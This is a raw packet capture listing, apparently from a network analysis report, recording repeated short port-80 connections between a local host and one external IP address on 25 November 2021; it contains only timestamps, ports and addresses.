                                              Nov 25, 2021 10:52:20.319286108 CET8050336176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:20.319498062 CET5033680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:20.353640079 CET8050336176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:20.387083054 CET8050336176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:20.387147903 CET8050336176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:20.387275934 CET5033680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:20.387360096 CET5033680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:20.421467066 CET8050336176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:20.681716919 CET5033780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:20.714989901 CET8050337176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:20.715214014 CET5033780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:20.716730118 CET5033780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:20.749916077 CET8050337176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:20.750154972 CET5033780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:20.783431053 CET8050337176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:20.803515911 CET8050337176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:20.803571939 CET8050337176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:20.803852081 CET5033780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:20.803947926 CET5033780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:20.837359905 CET8050337176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:21.202827930 CET5033880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:21.235980034 CET8050338176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:21.236231089 CET5033880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:21.237790108 CET5033880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:21.271034002 CET8050338176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:21.271239042 CET5033880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:21.304579973 CET8050338176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:21.325181961 CET8050338176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:21.325270891 CET8050338176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:21.325449944 CET5033880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:21.325511932 CET5033880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:21.358895063 CET8050338176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:21.679002047 CET5033980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:21.713198900 CET8050339176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:21.713433027 CET5033980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:21.714998007 CET5033980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:21.748964071 CET8050339176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:21.749106884 CET5033980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:21.783077002 CET8050339176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:21.807549953 CET8050339176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:21.807599068 CET8050339176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:21.807746887 CET5033980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:21.807795048 CET5033980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:21.841898918 CET8050339176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:22.191692114 CET5034080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:22.225106955 CET8050340176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:22.225301981 CET5034080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:22.226974964 CET5034080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:22.260508060 CET8050340176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:22.260694981 CET5034080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:22.294260025 CET8050340176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:22.313255072 CET8050340176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:22.313327074 CET8050340176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:22.313628912 CET5034080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:22.313747883 CET5034080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:22.347430944 CET8050340176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:22.708529949 CET5034180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:22.742645025 CET8050341176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:22.742870092 CET5034180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:22.744389057 CET5034180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:22.778434038 CET8050341176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:22.778665066 CET5034180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:22.812670946 CET8050341176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:22.829025030 CET8050341176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:22.829073906 CET8050341176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:22.829319954 CET5034180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:22.829370022 CET5034180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:22.863486052 CET8050341176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:23.235135078 CET5034280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:23.268660069 CET8050342176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:23.268861055 CET5034280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:23.270426035 CET5034280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:23.303776026 CET8050342176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:23.303985119 CET5034280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:23.337384939 CET8050342176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:23.354069948 CET8050342176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:23.354118109 CET8050342176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:23.354289055 CET5034280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:23.354520082 CET5034280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:23.387465000 CET8050342176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:23.734651089 CET5034380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:23.768691063 CET8050343176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:23.768965006 CET5034380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:23.770524979 CET5034380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:23.804553032 CET8050343176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:23.804945946 CET5034380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:23.839186907 CET8050343176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:23.855377913 CET8050343176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:23.855446100 CET8050343176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:23.855642080 CET5034380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:23.855741024 CET5034380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:23.889986992 CET8050343176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:24.234888077 CET5034480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:24.268305063 CET8050344176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:24.268501997 CET5034480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:24.270030022 CET5034480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:24.303375959 CET8050344176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:24.303558111 CET5034480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:24.336858988 CET8050344176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:24.353456020 CET8050344176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:24.353504896 CET8050344176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:24.353687048 CET5034480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:24.353735924 CET5034480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:24.387165070 CET8050344176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:24.668349981 CET5034580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:24.701570988 CET8050345176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:24.701730967 CET5034580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:24.703352928 CET5034580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:24.736495018 CET8050345176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:24.736711979 CET5034580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:24.769921064 CET8050345176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:24.805270910 CET8050345176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:24.805334091 CET8050345176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:24.805613041 CET5034580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:24.805695057 CET5034580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:24.839148045 CET8050345176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:25.161756039 CET5034680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:25.195960999 CET8050346176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:25.196202040 CET5034680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:25.197757959 CET5034680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:25.231772900 CET8050346176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:25.232018948 CET5034680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:25.266206026 CET8050346176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:25.303616047 CET8050346176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:25.303679943 CET8050346176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:25.303927898 CET5034680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:25.304269075 CET5034680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:25.337995052 CET8050346176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:25.654736042 CET5034780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:25.688201904 CET8050347176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:25.688448906 CET5034780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:25.690005064 CET5034780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:25.723259926 CET8050347176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:25.723462105 CET5034780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:25.756715059 CET8050347176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:25.791414976 CET8050347176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:25.791470051 CET8050347176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:25.791749001 CET5034780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:25.791831970 CET5034780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:25.825494051 CET8050347176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:26.189372063 CET5034880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:26.223356009 CET8050348176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:26.223606110 CET5034880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:26.225157022 CET5034880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:26.258975983 CET8050348176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:26.259187937 CET5034880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:26.293030024 CET8050348176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:26.315299988 CET8050348176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:26.315325975 CET8050348176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:26.315506935 CET5034880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:26.315531015 CET5034880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:26.349551916 CET8050348176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:26.708031893 CET5034980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:26.742139101 CET8050349176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:26.742387056 CET5034980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:26.744009018 CET5034980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:26.777993917 CET8050349176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:26.778235912 CET5034980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:26.812267065 CET8050349176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:26.827974081 CET8050349176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:26.828048944 CET8050349176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:26.828238964 CET5034980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:26.828289032 CET5034980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:26.862181902 CET8050349176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:27.217355013 CET5035080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:27.250489950 CET8050350176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:27.250637054 CET5035080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:27.252180099 CET5035080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:27.285289049 CET8050350176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:27.285602093 CET5035080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:27.318804979 CET8050350176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:27.335648060 CET8050350176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:27.335696936 CET8050350176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:27.335907936 CET5035080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:27.335959911 CET5035080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:27.369373083 CET8050350176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:27.729043007 CET5035180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:27.763086081 CET8050351176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:27.763422966 CET5035180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:27.764926910 CET5035180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:27.798968077 CET8050351176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:27.799151897 CET5035180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:27.833362103 CET8050351176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:27.849395990 CET8050351176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:27.849459887 CET8050351176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:27.849606037 CET5035180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:27.849669933 CET5035180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:27.883910894 CET8050351176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:28.228144884 CET5035280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:28.261533976 CET8050352176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:28.261821985 CET5035280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:28.263374090 CET5035280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:28.296710968 CET8050352176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:28.296890974 CET5035280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:28.330197096 CET8050352176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:28.348093033 CET8050352176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:28.348141909 CET8050352176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:28.348261118 CET5035280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:28.348294020 CET5035280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:28.381833076 CET8050352176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:28.711431026 CET5035380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:28.745594025 CET8050353176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:28.745733023 CET5035380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:28.747392893 CET5035380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:28.781438112 CET8050353176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:28.781620026 CET5035380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:28.815635920 CET8050353176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:28.834002972 CET8050353176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:28.834059000 CET8050353176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:28.834230900 CET5035380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:28.834270954 CET5035380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:28.868396997 CET8050353176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:29.142698050 CET5035480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:29.176754951 CET8050354176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:29.177000046 CET5035480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:29.178594112 CET5035480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:29.212750912 CET8050354176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:29.213073015 CET5035480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:29.247179985 CET8050354176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:29.265156984 CET8050354176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:29.265208006 CET8050354176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:29.265413046 CET5035480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:29.265465975 CET5035480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:29.299696922 CET8050354176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:29.654483080 CET5035580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:29.687947989 CET8050355176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:29.688122034 CET5035580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:29.689702988 CET5035580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:29.723176956 CET8050355176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:29.723548889 CET5035580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:29.757071972 CET8050355176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:29.779525995 CET8050355176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:29.779583931 CET8050355176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:29.779747009 CET5035580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:29.779894114 CET5035580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:29.813088894 CET8050355176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:30.125145912 CET5035680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:30.158935070 CET8050356176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:30.159230947 CET5035680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:30.160809040 CET5035680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:30.194578886 CET8050356176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:30.194834948 CET5035680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:30.228662014 CET8050356176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:30.252974033 CET8050356176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:30.252998114 CET8050356176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:30.253217936 CET5035680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:30.253237963 CET5035680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:30.287221909 CET8050356176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:30.648740053 CET5035780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:30.682256937 CET8050357176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:30.682442904 CET5035780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:30.684075117 CET5035780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:30.717514992 CET8050357176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:30.717711926 CET5035780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:30.751162052 CET8050357176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:30.771226883 CET8050357176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:30.771281958 CET8050357176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:30.771483898 CET5035780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:30.771539927 CET5035780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:30.804960012 CET8050357176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:31.096915007 CET5035880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:31.130124092 CET8050358176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:31.130264997 CET5035880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:31.132268906 CET5035880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:31.165431976 CET8050358176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:31.165750980 CET5035880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:31.199083090 CET8050358176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:31.228099108 CET8050358176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:31.228122950 CET8050358176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:31.228292942 CET5035880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:31.228316069 CET5035880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:31.261650085 CET8050358176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:31.607774019 CET5035980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:31.641777039 CET8050359176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:31.642064095 CET5035980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:31.643580914 CET5035980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:31.677583933 CET8050359176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:31.677800894 CET5035980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:31.711976051 CET8050359176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:31.736886024 CET8050359176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:31.736957073 CET8050359176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:31.737260103 CET5035980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:31.737361908 CET5035980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:31.771646023 CET8050359176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:32.132922888 CET5036080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:32.167059898 CET8050360176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:32.167265892 CET5036080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:32.168792963 CET5036080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:32.202871084 CET8050360176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:32.203115940 CET5036080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:32.237330914 CET8050360176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:32.253784895 CET8050360176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:32.253849030 CET8050360176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:32.254160881 CET5036080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:32.254271984 CET5036080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:32.288592100 CET8050360176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:32.667830944 CET5036180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:32.701833963 CET8050361176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:32.702029943 CET5036180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:32.703571081 CET5036180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:32.737550974 CET8050361176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:32.737766981 CET5036180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:32.771792889 CET8050361176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:32.796001911 CET8050361176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:32.796078920 CET8050361176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:32.796220064 CET5036180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:32.796256065 CET5036180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:32.830280066 CET8050361176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:33.130045891 CET5036280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:33.163311958 CET8050362176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:33.163500071 CET5036280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:33.165057898 CET5036280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:33.198369980 CET8050362176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:33.198584080 CET5036280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:33.231901884 CET8050362176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:33.247881889 CET8050362176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:33.247935057 CET8050362176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:33.248152971 CET5036280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:33.248200893 CET5036280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:33.281589985 CET8050362176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:33.640089035 CET5036380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:33.674160004 CET8050363176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:33.674731016 CET5036380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:33.675960064 CET5036380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:33.709974051 CET8050363176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:33.710185051 CET5036380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:33.744174957 CET8050363176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:33.761866093 CET8050363176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:33.761921883 CET8050363176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:33.762197971 CET5036380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:33.762298107 CET5036380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:33.796437025 CET8050363176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:34.152817011 CET5036480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:34.186979055 CET8050364176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:34.187294006 CET5036480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:34.188796043 CET5036480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:34.222781897 CET8050364176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:34.223037958 CET5036480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:34.257050037 CET8050364176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:34.276300907 CET8050364176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:34.276349068 CET8050364176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:34.276844978 CET5036480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:34.276885986 CET5036480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:34.310992956 CET8050364176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:34.667156935 CET5036580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:34.700553894 CET8050365176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:34.700803995 CET5036580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:34.702326059 CET5036580192.168.11.20176.223.209.128
